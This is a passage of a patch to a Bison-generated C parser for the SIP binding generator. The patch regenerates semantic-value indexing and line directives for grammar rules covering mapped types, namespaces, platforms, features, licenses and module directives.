*/ + for (mtt = currentSpec->mappedtypetemplates; mtt != NULL; mtt = mtt->next) +- if (compareScopedNames(mtt->mt->type.u.td->fqname, (yyvsp[(3) - (4)].memArg).u.td->fqname ) == 0 && sameTemplateSignature(&mtt->mt->type.u.td->types, &(yyvsp[(3) - (4)].memArg).u.td->types, TRUE)) ++ if (compareScopedNames(mtt->mt->type.u.td->fqname, (yyvsp[-1].memArg).u.td->fqname ) == 0 && sameTemplateSignature(&mtt->mt->type.u.td->types, &(yyvsp[-1].memArg).u.td->types, TRUE)) + yyerror("%MappedType template for this type has already been defined"); + +- (yyvsp[(3) - (4)].memArg).nrderefs = 0; +- (yyvsp[(3) - (4)].memArg).argflags = 0; ++ (yyvsp[-1].memArg).nrderefs = 0; ++ (yyvsp[-1].memArg).argflags = 0; + + mtt = sipMalloc(sizeof (mappedTypeTmplDef)); + +- mtt->sig = (yyvsp[(1) - (4)].signature); +- mtt->mt = allocMappedType(currentSpec, &(yyvsp[(3) - (4)].memArg)); +- mappedTypeAnnos(mtt->mt, &(yyvsp[(4) - (4)].optflags)); ++ mtt->sig = (yyvsp[-3].signature); ++ mtt->mt = allocMappedType(currentSpec, &(yyvsp[-1].memArg)); ++ mappedTypeAnnos(mtt->mt, &(yyvsp[0].optflags)); + mtt->next = currentSpec->mappedtypetemplates; + + currentSpec->mappedtypetemplates = mtt; +@@ -3741,11 +3380,12 @@ yyreduce: + mtt->mt->iff = iff; + } + } ++#line 3384 "../parser.c" + break; + +- case 108: +-#line 1233 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 108: /* mtdefinition: '{' mtbody '}' ';' */ ++#line 1234 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->convfromcode == NULL) +@@ -3757,83 +3397,90 @@ yyreduce: + currentMappedType = NULL; + } + } ++#line 3401 "../parser.c" + break; + +- case 113: +-#line 1253 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 113: /* mtline: typehdrcode */ ++#line 1254 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tMappedType->iff->hdrcode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tMappedType->iff->hdrcode, (yyvsp[0].codeb)); + } ++#line 3410 "../parser.c" + break; + +- case 114: +-#line 1257 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 114: /* mtline: typecode */ ++#line 1258 "parser.y" ++ { + if (notSkipping()) +- appendCodeBlock(¤tMappedType->typecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tMappedType->typecode, (yyvsp[0].codeb)); + } ++#line 3419 "../parser.c" + break; + +- case 115: +-#line 1261 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 115: /* mtline: TK_FROMTYPE codeblock */ ++#line 1262 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->convfromcode != NULL) + yyerror("%MappedType has more than one %ConvertFromTypeCode directive"); + +- appendCodeBlock(¤tMappedType->convfromcode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tMappedType->convfromcode, (yyvsp[0].codeb)); + } + } ++#line 3433 "../parser.c" + break; + +- case 116: +-#line 1270 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 116: /* mtline: TK_TOTYPE codeblock */ ++#line 1271 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->convtocode != NULL) + yyerror("%MappedType has more than one %ConvertToTypeCode directive"); + +- appendCodeBlock(¤tMappedType->convtocode, (yyvsp[(2) - (2)].codeb)); ++ appendCodeBlock(¤tMappedType->convtocode, (yyvsp[0].codeb)); + } + } ++#line 3447 "../parser.c" + break; + +- case 117: +-#line 1279 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 117: /* mtline: instancecode */ ++#line 1280 "parser.y" ++ { + if (notSkipping()) + { + if (currentMappedType->instancecode != NULL) + yyerror("%MappedType has more than one %InstanceCode directive"); + +- appendCodeBlock(¤tMappedType->instancecode, (yyvsp[(1) - (1)].codeb)); ++ appendCodeBlock(¤tMappedType->instancecode, (yyvsp[0].codeb)); + } + } ++#line 3461 "../parser.c" + break; + +- case 120: +-#line 1292 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 120: /* mtfunction: TK_STATIC cpptype TK_NAME_VALUE '(' arglist ')' optconst optexceptions optflags optsig ';' optdocstring premethodcode methodcode */ ++#line 1293 "parser.y" ++ { + if 
(notSkipping()) + { +- applyTypeFlags(currentModule, &(yyvsp[(2) - (14)].memArg), &(yyvsp[(9) - (14)].optflags)); ++ applyTypeFlags(currentModule, &(yyvsp[-12].memArg), &(yyvsp[-5].optflags)); + +- (yyvsp[(5) - (14)].signature).result = (yyvsp[(2) - (14)].memArg); ++ (yyvsp[-9].signature).result = (yyvsp[-12].memArg); + + newFunction(currentSpec, currentModule, NULL, NULL, +- currentMappedType, 0, TRUE, FALSE, FALSE, FALSE, (yyvsp[(3) - (14)].text), +- &(yyvsp[(5) - (14)].signature), (yyvsp[(7) - (14)].number), FALSE, &(yyvsp[(9) - (14)].optflags), (yyvsp[(14) - (14)].codeb), NULL, NULL, (yyvsp[(8) - (14)].throwlist), (yyvsp[(10) - (14)].optsignature), (yyvsp[(12) - (14)].docstr), +- FALSE, (yyvsp[(13) - (14)].codeb)); ++ currentMappedType, 0, TRUE, FALSE, FALSE, FALSE, (yyvsp[-11].text), ++ &(yyvsp[-9].signature), (yyvsp[-7].number), FALSE, &(yyvsp[-5].optflags), (yyvsp[0].codeb), NULL, NULL, (yyvsp[-6].throwlist), (yyvsp[-4].optsignature), (yyvsp[-2].docstr), ++ FALSE, (yyvsp[-1].codeb)); + } + } ++#line 3479 "../parser.c" + break; + +- case 121: +-#line 1307 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 121: /* $@4: %empty */ ++#line 1308 "parser.y" ++ { + if (currentSpec -> genc) + yyerror("namespace definition not allowed in a C module"); + +@@ -3848,18 +3495,19 @@ yyreduce: + scope = NULL; + + ns = newClass(currentSpec, namespace_iface, NULL, +- text2scopedName(scope, (yyvsp[(2) - (2)].text)), NULL, NULL, NULL, NULL); ++ text2scopedName(scope, (yyvsp[0].text)), NULL, NULL, NULL, NULL); + + pushScope(ns); + + sectionFlags = 0; + } + } ++#line 3506 "../parser.c" + break; + +- case 122: +-#line 1328 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 122: /* namespace: TK_NAMESPACE TK_NAME_VALUE $@4 optnsbody ';' */ ++#line 1329 "parser.y" ++ { + if (notSkipping()) + { + if (inMainModule()) +@@ -3873,11 +3521,12 @@ yyreduce: + popScope(); + } + } ++#line 3525 "../parser.c" + break; + +- case 127: +-#line 1352 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ 
case 127: /* $@5: %empty */ ++#line 1353 "parser.y" ++ { + if (notSkipping()) + { + qualDef *qd; +@@ -3887,11 +3536,12 @@ yyreduce: + yyerror("%Platforms has already been defined for this module"); + } + } ++#line 3540 "../parser.c" + break; + +- case 128: +-#line 1362 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 128: /* platforms: TK_PLATFORMS $@5 '{' platformlist '}' */ ++#line 1363 "parser.y" ++ { + if (notSkipping()) + { + qualDef *qd; +@@ -3908,71 +3558,79 @@ yyreduce: + yyerror("No more than one of these %Platforms must be specified with the -t flag"); + } + } ++#line 3562 "../parser.c" + break; + +- case 131: +-#line 1385 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[(1) - (1)].text), ++ case 131: /* platform: TK_NAME_VALUE */ ++#line 1386 "parser.y" ++ { ++ newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[0].text), + platform_qualifier); + } ++#line 3571 "../parser.c" + break; + +- case 132: +-#line 1391 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[(2) - (2)].feature).name, ++ case 132: /* feature: TK_FEATURE feature_args */ ++#line 1392 "parser.y" ++ { ++ newQualifier(currentModule, -1, -1, notSkipping(), (yyvsp[0].feature).name, + feature_qualifier); + } ++#line 3580 "../parser.c" + break; + +- case 133: +-#line 1397 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 133: /* feature_args: TK_NAME_VALUE */ ++#line 1398 "parser.y" ++ { + resetLexerState(); + +- (yyval.feature).name = (yyvsp[(1) - (1)].text); ++ (yyval.feature).name = (yyvsp[0].text); + } ++#line 3590 "../parser.c" + break; + +- case 134: +-#line 1402 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.feature) = (yyvsp[(2) - (3)].feature); ++ case 134: /* feature_args: '(' feature_arg_list ')' */ ++#line 1403 "parser.y" ++ { ++ (yyval.feature) = (yyvsp[-1].feature); + } ++#line 3598 "../parser.c" + break; + +- case 136: +-#line 1408 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.feature) = (yyvsp[(1) - (3)].feature); ++ case 136: /* feature_arg_list: feature_arg_list ',' feature_arg */ ++#line 1409 "parser.y" ++ { ++ (yyval.feature) = (yyvsp[-2].feature); + +- switch ((yyvsp[(3) - (3)].feature).token) ++ switch ((yyvsp[0].feature).token) + { +- case TK_NAME: (yyval.feature).name = (yyvsp[(3) - (3)].feature).name; break; ++ case TK_NAME: (yyval.feature).name = (yyvsp[0].feature).name; break; + } + } ++#line 3611 "../parser.c" + break; + +- case 137: +-#line 1418 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 137: /* feature_arg: TK_NAME '=' name_or_string */ ++#line 1419 "parser.y" ++ { + (yyval.feature).token = TK_NAME; + +- (yyval.feature).name = (yyvsp[(3) - (3)].text); ++ (yyval.feature).name = (yyvsp[0].text); + } ++#line 3621 "../parser.c" + break; + +- case 138: +-#line 1425 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 138: /* $@6: %empty */ ++#line 1426 "parser.y" ++ { + currentTimelineOrder = 0; + } ++#line 3629 "../parser.c" + break; + +- case 139: +-#line 1428 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 139: /* timeline: TK_TIMELINE $@6 '{' qualifierlist '}' */ ++#line 1429 "parser.y" ++ { + if (notSkipping()) + { + qualDef *qd; +@@ -3993,129 +3651,140 @@ yyreduce: + currentModule->nrtimelines++; + } + } ++#line 3655 "../parser.c" + break; + +- case 142: +-#line 1455 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 142: /* qualifiername: TK_NAME_VALUE */ ++#line 1456 "parser.y" ++ { + newQualifier(currentModule, currentModule->nrtimelines, +- currentTimelineOrder++, TRUE, (yyvsp[(1) - (1)].text), time_qualifier); ++ currentTimelineOrder++, TRUE, (yyvsp[0].text), time_qualifier); + } ++#line 3664 "../parser.c" + break; + +- case 143: +-#line 1461 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 143: /* $@7: %empty */ ++#line 1462 "parser.y" ++ { + currentPlatforms = NULL; + } ++#line 3672 "../parser.c" + break; + +- case 144: +-#line 1463 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 144: /* ifstart: TK_IF '(' $@7 qualifiers ')' */ ++#line 1464 "parser.y" ++ { + if (stackPtr >= MAX_NESTED_IF) + yyerror("Internal error: increase the value of MAX_NESTED_IF"); + + /* Nested %Ifs are implicit logical ands. */ + + if (stackPtr > 0) +- (yyvsp[(4) - (5)].boolean) = ((yyvsp[(4) - (5)].boolean) && skipStack[stackPtr - 1]); ++ (yyvsp[-1].boolean) = ((yyvsp[-1].boolean) && skipStack[stackPtr - 1]); + +- skipStack[stackPtr] = (yyvsp[(4) - (5)].boolean); ++ skipStack[stackPtr] = (yyvsp[-1].boolean); + + platformStack[stackPtr] = currentPlatforms; + + ++stackPtr; + } ++#line 3692 "../parser.c" + break; + +- case 145: +-#line 1480 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = platOrFeature((yyvsp[(1) - (1)].text), FALSE); ++ case 145: /* oredqualifiers: TK_NAME_VALUE */ ++#line 1481 "parser.y" ++ { ++ (yyval.boolean) = platOrFeature((yyvsp[0].text), FALSE); + } ++#line 3700 "../parser.c" + break; + +- case 146: +-#line 1483 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = platOrFeature((yyvsp[(2) - (2)].text), TRUE); ++ case 146: /* oredqualifiers: '!' TK_NAME_VALUE */ ++#line 1484 "parser.y" ++ { ++ (yyval.boolean) = platOrFeature((yyvsp[0].text), TRUE); + } ++#line 3708 "../parser.c" + break; + +- case 147: +-#line 1486 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = (platOrFeature((yyvsp[(3) - (3)].text), FALSE) || (yyvsp[(1) - (3)].boolean)); ++ case 147: /* oredqualifiers: oredqualifiers TK_LOGICAL_OR TK_NAME_VALUE */ ++#line 1487 "parser.y" ++ { ++ (yyval.boolean) = (platOrFeature((yyvsp[0].text), FALSE) || (yyvsp[-2].boolean)); + } ++#line 3716 "../parser.c" + break; + +- case 148: +-#line 1489 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = (platOrFeature((yyvsp[(4) - (4)].text), TRUE) || (yyvsp[(1) - (4)].boolean)); ++ case 148: /* oredqualifiers: oredqualifiers TK_LOGICAL_OR '!' 
TK_NAME_VALUE */ ++#line 1490 "parser.y" ++ { ++ (yyval.boolean) = (platOrFeature((yyvsp[0].text), TRUE) || (yyvsp[-3].boolean)); + } ++#line 3724 "../parser.c" + break; + +- case 150: +-#line 1495 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.boolean) = timePeriod((yyvsp[(1) - (3)].text), (yyvsp[(3) - (3)].text)); ++ case 150: /* qualifiers: optname '-' optname */ ++#line 1496 "parser.y" ++ { ++ (yyval.boolean) = timePeriod((yyvsp[-2].text), (yyvsp[0].text)); + } ++#line 3732 "../parser.c" + break; + +- case 151: +-#line 1500 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 151: /* ifend: TK_END */ ++#line 1501 "parser.y" ++ { + if (stackPtr-- <= 0) + yyerror("Too many %End directives"); + + currentPlatforms = (stackPtr == 0 ? NULL : platformStack[stackPtr - 1]); + } ++#line 3743 "../parser.c" + break; + +- case 152: +-#line 1508 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 152: /* license: TK_LICENSE license_args optflags */ ++#line 1509 "parser.y" ++ { + optFlag *of; + +- if ((yyvsp[(3) - (3)].optflags).nrFlags != 0) ++ if ((yyvsp[0].optflags).nrFlags != 0) + deprecated("%License annotations are deprecated, use arguments instead"); + +- if ((yyvsp[(2) - (3)].license).type == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Type", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).type = of->fvalue.sval; +- +- if ((yyvsp[(2) - (3)].license).licensee == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Licensee", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).licensee = of->fvalue.sval; +- +- if ((yyvsp[(2) - (3)].license).signature == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Signature", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).signature = of->fvalue.sval; +- +- if ((yyvsp[(2) - (3)].license).timestamp == NULL) +- if ((of = getOptFlag(&(yyvsp[(3) - (3)].optflags), "Timestamp", string_flag)) != NULL) +- (yyvsp[(2) - (3)].license).timestamp = of->fvalue.sval; ++ if 
((yyvsp[-1].license).type == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Type", string_flag)) != NULL) ++ (yyvsp[-1].license).type = of->fvalue.sval; ++ ++ if ((yyvsp[-1].license).licensee == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Licensee", string_flag)) != NULL) ++ (yyvsp[-1].license).licensee = of->fvalue.sval; ++ ++ if ((yyvsp[-1].license).signature == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Signature", string_flag)) != NULL) ++ (yyvsp[-1].license).signature = of->fvalue.sval; ++ ++ if ((yyvsp[-1].license).timestamp == NULL) ++ if ((of = getOptFlag(&(yyvsp[0].optflags), "Timestamp", string_flag)) != NULL) ++ (yyvsp[-1].license).timestamp = of->fvalue.sval; + +- if ((yyvsp[(2) - (3)].license).type == NULL) ++ if ((yyvsp[-1].license).type == NULL) + yyerror("%License must have a 'type' argument"); + + if (notSkipping()) + { + currentModule->license = sipMalloc(sizeof (licenseDef)); + +- currentModule->license->type = (yyvsp[(2) - (3)].license).type; +- currentModule->license->licensee = (yyvsp[(2) - (3)].license).licensee; +- currentModule->license->sig = (yyvsp[(2) - (3)].license).signature; +- currentModule->license->timestamp = (yyvsp[(2) - (3)].license).timestamp; ++ currentModule->license->type = (yyvsp[-1].license).type; ++ currentModule->license->licensee = (yyvsp[-1].license).licensee; ++ currentModule->license->sig = (yyvsp[-1].license).signature; ++ currentModule->license->timestamp = (yyvsp[-1].license).timestamp; + } + } ++#line 3783 "../parser.c" + break; + +- case 153: +-#line 1545 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 153: /* license_args: %empty */ ++#line 1546 "parser.y" ++ { + resetLexerState(); + + (yyval.license).type = NULL; +@@ -4123,242 +3792,265 @@ yyreduce: + (yyval.license).signature = NULL; + (yyval.license).timestamp = NULL; + } ++#line 3796 "../parser.c" + break; + +- case 154: +-#line 1553 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.license).type = (yyvsp[(1) - (1)].text); ++ 
case 154: /* license_args: TK_STRING_VALUE */ ++#line 1554 "parser.y" ++ { ++ (yyval.license).type = (yyvsp[0].text); + (yyval.license).licensee = NULL; + (yyval.license).signature = NULL; + (yyval.license).timestamp = NULL; + } ++#line 3807 "../parser.c" + break; + +- case 155: +-#line 1559 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.license) = (yyvsp[(2) - (3)].license); ++ case 155: /* license_args: '(' license_arg_list ')' */ ++#line 1560 "parser.y" ++ { ++ (yyval.license) = (yyvsp[-1].license); + } ++#line 3815 "../parser.c" + break; + +- case 157: +-#line 1565 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.license) = (yyvsp[(1) - (3)].license); ++ case 157: /* license_arg_list: license_arg_list ',' license_arg */ ++#line 1566 "parser.y" ++ { ++ (yyval.license) = (yyvsp[-2].license); + +- switch ((yyvsp[(3) - (3)].license).token) ++ switch ((yyvsp[0].license).token) + { +- case TK_TYPE: (yyval.license).type = (yyvsp[(3) - (3)].license).type; break; +- case TK_LICENSEE: (yyval.license).licensee = (yyvsp[(3) - (3)].license).licensee; break; +- case TK_SIGNATURE: (yyval.license).signature = (yyvsp[(3) - (3)].license).signature; break; +- case TK_TIMESTAMP: (yyval.license).timestamp = (yyvsp[(3) - (3)].license).timestamp; break; ++ case TK_TYPE: (yyval.license).type = (yyvsp[0].license).type; break; ++ case TK_LICENSEE: (yyval.license).licensee = (yyvsp[0].license).licensee; break; ++ case TK_SIGNATURE: (yyval.license).signature = (yyvsp[0].license).signature; break; ++ case TK_TIMESTAMP: (yyval.license).timestamp = (yyvsp[0].license).timestamp; break; + } + } ++#line 3831 "../parser.c" + break; + +- case 158: +-#line 1578 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 158: /* license_arg: TK_TYPE '=' TK_STRING_VALUE */ ++#line 1579 "parser.y" ++ { + (yyval.license).token = TK_NAME; + +- (yyval.license).type = (yyvsp[(3) - (3)].text); ++ (yyval.license).type = (yyvsp[0].text); + (yyval.license).licensee = NULL; + (yyval.license).signature = 
NULL; + (yyval.license).timestamp = NULL; + } ++#line 3844 "../parser.c" + break; + +- case 159: +-#line 1586 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 159: /* license_arg: TK_LICENSEE '=' TK_STRING_VALUE */ ++#line 1587 "parser.y" ++ { + (yyval.license).token = TK_LICENSEE; + + (yyval.license).type = NULL; +- (yyval.license).licensee = (yyvsp[(3) - (3)].text); ++ (yyval.license).licensee = (yyvsp[0].text); + (yyval.license).signature = NULL; + (yyval.license).timestamp = NULL; + } ++#line 3857 "../parser.c" + break; + +- case 160: +-#line 1594 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 160: /* license_arg: TK_SIGNATURE '=' TK_STRING_VALUE */ ++#line 1595 "parser.y" ++ { + (yyval.license).token = TK_SIGNATURE; + + (yyval.license).type = NULL; + (yyval.license).licensee = NULL; +- (yyval.license).signature = (yyvsp[(3) - (3)].text); ++ (yyval.license).signature = (yyvsp[0].text); + (yyval.license).timestamp = NULL; + } ++#line 3870 "../parser.c" + break; + +- case 161: +-#line 1602 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 161: /* license_arg: TK_TIMESTAMP '=' TK_STRING_VALUE */ ++#line 1603 "parser.y" ++ { + (yyval.license).token = TK_TIMESTAMP; + + (yyval.license).type = NULL; + (yyval.license).licensee = NULL; + (yyval.license).signature = NULL; +- (yyval.license).timestamp = (yyvsp[(3) - (3)].text); ++ (yyval.license).timestamp = (yyvsp[0].text); + } ++#line 3883 "../parser.c" + break; + +- case 162: +-#line 1612 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 162: /* defmetatype: TK_DEFMETATYPE defmetatype_args */ ++#line 1613 "parser.y" ++ { + if (notSkipping()) + { + if (currentModule->defmetatype != NULL) + yyerror("%DefaultMetatype has already been defined for this module"); + +- currentModule->defmetatype = cacheName(currentSpec, (yyvsp[(2) - (2)].defmetatype).name); ++ currentModule->defmetatype = cacheName(currentSpec, (yyvsp[0].defmetatype).name); + } + } ++#line 3897 "../parser.c" + break; + +- case 163: +-#line 1623 
"sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 163: /* defmetatype_args: dottedname */ ++#line 1624 "parser.y" ++ { + resetLexerState(); + +- (yyval.defmetatype).name = (yyvsp[(1) - (1)].text); ++ (yyval.defmetatype).name = (yyvsp[0].text); + } ++#line 3907 "../parser.c" + break; + +- case 164: +-#line 1628 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defmetatype) = (yyvsp[(2) - (3)].defmetatype); ++ case 164: /* defmetatype_args: '(' defmetatype_arg_list ')' */ ++#line 1629 "parser.y" ++ { ++ (yyval.defmetatype) = (yyvsp[-1].defmetatype); + } ++#line 3915 "../parser.c" + break; + +- case 166: +-#line 1634 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defmetatype) = (yyvsp[(1) - (3)].defmetatype); ++ case 166: /* defmetatype_arg_list: defmetatype_arg_list ',' defmetatype_arg */ ++#line 1635 "parser.y" ++ { ++ (yyval.defmetatype) = (yyvsp[-2].defmetatype); + +- switch ((yyvsp[(3) - (3)].defmetatype).token) ++ switch ((yyvsp[0].defmetatype).token) + { +- case TK_NAME: (yyval.defmetatype).name = (yyvsp[(3) - (3)].defmetatype).name; break; ++ case TK_NAME: (yyval.defmetatype).name = (yyvsp[0].defmetatype).name; break; + } + } ++#line 3928 "../parser.c" + break; + +- case 167: +-#line 1644 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 167: /* defmetatype_arg: TK_NAME '=' dottedname */ ++#line 1645 "parser.y" ++ { + (yyval.defmetatype).token = TK_NAME; + +- (yyval.defmetatype).name = (yyvsp[(3) - (3)].text); ++ (yyval.defmetatype).name = (yyvsp[0].text); + } ++#line 3938 "../parser.c" + break; + +- case 168: +-#line 1651 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 168: /* defsupertype: TK_DEFSUPERTYPE defsupertype_args */ ++#line 1652 "parser.y" ++ { + if (notSkipping()) + { + if (currentModule->defsupertype != NULL) + yyerror("%DefaultSupertype has already been defined for this module"); + +- currentModule->defsupertype = cacheName(currentSpec, (yyvsp[(2) - (2)].defsupertype).name); ++ currentModule->defsupertype = cacheName(currentSpec, 
(yyvsp[0].defsupertype).name); + } + } ++#line 3952 "../parser.c" + break; + +- case 169: +-#line 1662 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 169: /* defsupertype_args: dottedname */ ++#line 1663 "parser.y" ++ { + resetLexerState(); + +- (yyval.defsupertype).name = (yyvsp[(1) - (1)].text); ++ (yyval.defsupertype).name = (yyvsp[0].text); + } ++#line 3962 "../parser.c" + break; + +- case 170: +-#line 1667 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defsupertype) = (yyvsp[(2) - (3)].defsupertype); ++ case 170: /* defsupertype_args: '(' defsupertype_arg_list ')' */ ++#line 1668 "parser.y" ++ { ++ (yyval.defsupertype) = (yyvsp[-1].defsupertype); + } ++#line 3970 "../parser.c" + break; + +- case 172: +-#line 1673 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.defsupertype) = (yyvsp[(1) - (3)].defsupertype); ++ case 172: /* defsupertype_arg_list: defsupertype_arg_list ',' defsupertype_arg */ ++#line 1674 "parser.y" ++ { ++ (yyval.defsupertype) = (yyvsp[-2].defsupertype); + +- switch ((yyvsp[(3) - (3)].defsupertype).token) ++ switch ((yyvsp[0].defsupertype).token) + { +- case TK_NAME: (yyval.defsupertype).name = (yyvsp[(3) - (3)].defsupertype).name; break; ++ case TK_NAME: (yyval.defsupertype).name = (yyvsp[0].defsupertype).name; break; + } + } ++#line 3983 "../parser.c" + break; + +- case 173: +-#line 1683 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 173: /* defsupertype_arg: TK_NAME '=' dottedname */ ++#line 1684 "parser.y" ++ { + (yyval.defsupertype).token = TK_NAME; + +- (yyval.defsupertype).name = (yyvsp[(3) - (3)].text); ++ (yyval.defsupertype).name = (yyvsp[0].text); + } ++#line 3993 "../parser.c" + break; + +- case 174: +-#line 1690 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 174: /* hiddenns: TK_HIDE_NS hiddenns_args */ ++#line 1691 "parser.y" ++ { + if (notSkipping()) + { + classDef *ns; + + ns = newClass(currentSpec, namespace_iface, NULL, +- fullyQualifiedName((yyvsp[(2) - (2)].hiddenns).name), NULL, NULL, NULL, NULL); ++ 
fullyQualifiedName((yyvsp[0].hiddenns).name), NULL, NULL, NULL, NULL); + setHiddenNamespace(ns); + } + } ++#line 4008 "../parser.c" + break; + +- case 175: +-#line 1702 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 175: /* hiddenns_args: scopedname */ ++#line 1703 "parser.y" ++ { + resetLexerState(); + +- (yyval.hiddenns).name = (yyvsp[(1) - (1)].scpvalp); ++ (yyval.hiddenns).name = (yyvsp[0].scpvalp); + } ++#line 4018 "../parser.c" + break; + +- case 176: +-#line 1707 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.hiddenns) = (yyvsp[(2) - (3)].hiddenns); ++ case 176: /* hiddenns_args: '(' hiddenns_arg_list ')' */ ++#line 1708 "parser.y" ++ { ++ (yyval.hiddenns) = (yyvsp[-1].hiddenns); + } ++#line 4026 "../parser.c" + break; + +- case 178: +-#line 1713 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.hiddenns) = (yyvsp[(1) - (3)].hiddenns); ++ case 178: /* hiddenns_arg_list: hiddenns_arg_list ',' hiddenns_arg */ ++#line 1714 "parser.y" ++ { ++ (yyval.hiddenns) = (yyvsp[-2].hiddenns); + +- switch ((yyvsp[(3) - (3)].hiddenns).token) ++ switch ((yyvsp[0].hiddenns).token) + { +- case TK_NAME: (yyval.hiddenns).name = (yyvsp[(3) - (3)].hiddenns).name; break; ++ case TK_NAME: (yyval.hiddenns).name = (yyvsp[0].hiddenns).name; break; + } + } ++#line 4039 "../parser.c" + break; + +- case 179: +-#line 1723 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 179: /* hiddenns_arg: TK_NAME '=' scopedname */ ++#line 1724 "parser.y" ++ { + (yyval.hiddenns).token = TK_NAME; + +- (yyval.hiddenns).name = (yyvsp[(3) - (3)].scpvalp); ++ (yyval.hiddenns).name = (yyvsp[0].scpvalp); + } ++#line 4049 "../parser.c" + break; + +- case 180: +-#line 1730 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 180: /* consmodule: TK_CONSMODULE consmodule_args consmodule_body */ ++#line 1731 "parser.y" ++ { + deprecated("%ConsolidatedModule is deprecated and will not be supported by SIP v5"); + + if (notSkipping()) +@@ -4370,99 +4062,109 @@ yyreduce: + if (currentModule->fullname != 
NULL) + yyerror("%ConsolidatedModule must appear before any %Module or %CModule directive"); + +- setModuleName(currentSpec, currentModule, (yyvsp[(2) - (3)].consmodule).name); +- currentModule->docstring = (yyvsp[(3) - (3)].consmodule).docstring; ++ setModuleName(currentSpec, currentModule, (yyvsp[-1].consmodule).name); ++ currentModule->docstring = (yyvsp[0].consmodule).docstring; + + setIsConsolidated(currentModule); + } + } ++#line 4072 "../parser.c" + break; + +- case 181: +-#line 1750 "sip-4.19.23/sipgen/metasrc/parser.y" +- { ++ case 181: /* consmodule_args: dottedname */ ++#line 1751 "parser.y" ++ { + resetLexerState(); + +- (yyval.consmodule).name = (yyvsp[(1) - (1)].text); ++ (yyval.consmodule).name = (yyvsp[0].text); + } ++#line 4082 "../parser.c" + break; + +- case 182: +-#line 1755 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = (yyvsp[(2) - (3)].consmodule); ++ case 182: /* consmodule_args: '(' consmodule_arg_list ')' */ ++#line 1756 "parser.y" ++ { ++ (yyval.consmodule) = (yyvsp[-1].consmodule); + } ++#line 4090 "../parser.c" + break; + +- case 184: +-#line 1761 "sip-4.19.23/sipgen/metasrc/parser.y" +- { +- (yyval.consmodule) = 